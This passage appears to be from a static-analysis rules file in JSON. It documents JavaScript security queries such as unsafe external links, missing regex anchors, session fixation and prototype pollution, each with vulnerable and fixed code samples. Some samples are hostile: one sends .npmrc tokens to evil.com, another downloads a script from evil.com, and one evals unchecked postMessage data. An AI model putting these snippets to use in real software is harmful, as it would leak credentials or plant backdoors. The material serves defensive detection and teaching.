escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-116" ], - "description" : "Replacing a substring with itself has no effect and may indicate a mistake.", - "id" : "js/identity-replacement", - "kind" : "problem", - "name" : "Replacement of a substring with itself", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/unsafe-external-link", - "name" : "js/unsafe-external-link", - "shortDescription" : { - "text" : "Potentially unsafe external link" - }, - "fullDescription" : { - "text" : "External links that open in a new tab or window but do not specify link type 'noopener' or 'noreferrer' are a potential security risk." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n", - "markdown" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n" - }, - "properties" : { - "tags" : [ "maintainability", "security", "external/cwe/cwe-200", "external/cwe/cwe-1022" ], - "description" : "External links that open in a new tab or window but do not specify\n link type 'noopener' or 'noreferrer' are a potential security risk.", - "id" : "js/unsafe-external-link", - "kind" : "problem", - "name" : "Potentially unsafe external link", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/regex/missing-regexp-anchor", - "name" : "js/regex/missing-regexp-anchor", - "shortDescription" : { - "text" : "Missing regular expression anchor" - }, - "fullDescription" : { - "text" : "Regular expressions without anchors can be vulnerable to bypassing." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Regular expressions without anchors can be vulnerable to bypassing.", - "id" : "js/regex/missing-regexp-anchor", - "kind" : "problem", - "name" : "Missing regular expression anchor", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/missing-origin-check", - "name" : "js/missing-origin-check", - "shortDescription" : { - "text" : "Missing origin verification in `postMessage` handler" - }, - "fullDescription" : { - "text" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n", - "markdown" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-940" ], - "description" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler.", - "id" : "js/missing-origin-check", - "kind" : "problem", - "name" : "Missing origin verification in `postMessage` handler", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "5" - } - }, { - "id" : "js/file-access-to-http", - "name" : "js/file-access-to-http", - "shortDescription" : { - "text" : "File data in outbound network request" - }, - "fullDescription" : { - "text" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n", - "markdown" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-200" ], - "description" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure.", - "id" : "js/file-access-to-http", - "kind" : "path-problem", - "name" : "File data in outbound network request", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/session-fixation", - "name" : "js/session-fixation", - "shortDescription" : { - "text" : "Failure to abandon session" - }, - "fullDescription" : { - "text" : "Reusing an existing session as a different user could allow an attacker to access someone else's account by using their session." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n", - "markdown" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-384" ], - "description" : "Reusing an existing session as a different user could allow\n an attacker to access someone else's account by using\n their session.", - "id" : "js/session-fixation", - "kind" : "problem", - "name" : "Failure to abandon session", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "5" - } - }, { - "id" : "js/client-side-request-forgery", - "name" : "js/client-side-request-forgery", - "shortDescription" : { - "text" : "Client-side request forgery" - }, - "fullDescription" : { - "text" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack against the client." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", - "markdown" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-918" ], - "description" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack\n against the client.", - "id" : "js/client-side-request-forgery", - "kind" : "path-problem", - "name" : "Client-side request forgery", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "5.0" - } - }, { - "id" : "js/remote-property-injection", - "name" : "js/remote-property-injection", - "shortDescription" : { - "text" : "Remote property injection" - }, - "fullDescription" : { - "text" : "Allowing writes to arbitrary properties of an object may lead to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-250", "external/cwe/cwe-400" ], - "description" : "Allowing writes to arbitrary properties of an object may lead to\n denial-of-service attacks.", - "id" : "js/remote-property-injection", - "kind" : "path-problem", - "name" : "Remote property injection", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/http-to-file-access", - "name" : "js/http-to-file-access", - "shortDescription" : { - "text" : "Network data written to file" - }, - "fullDescription" : { - "text" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* 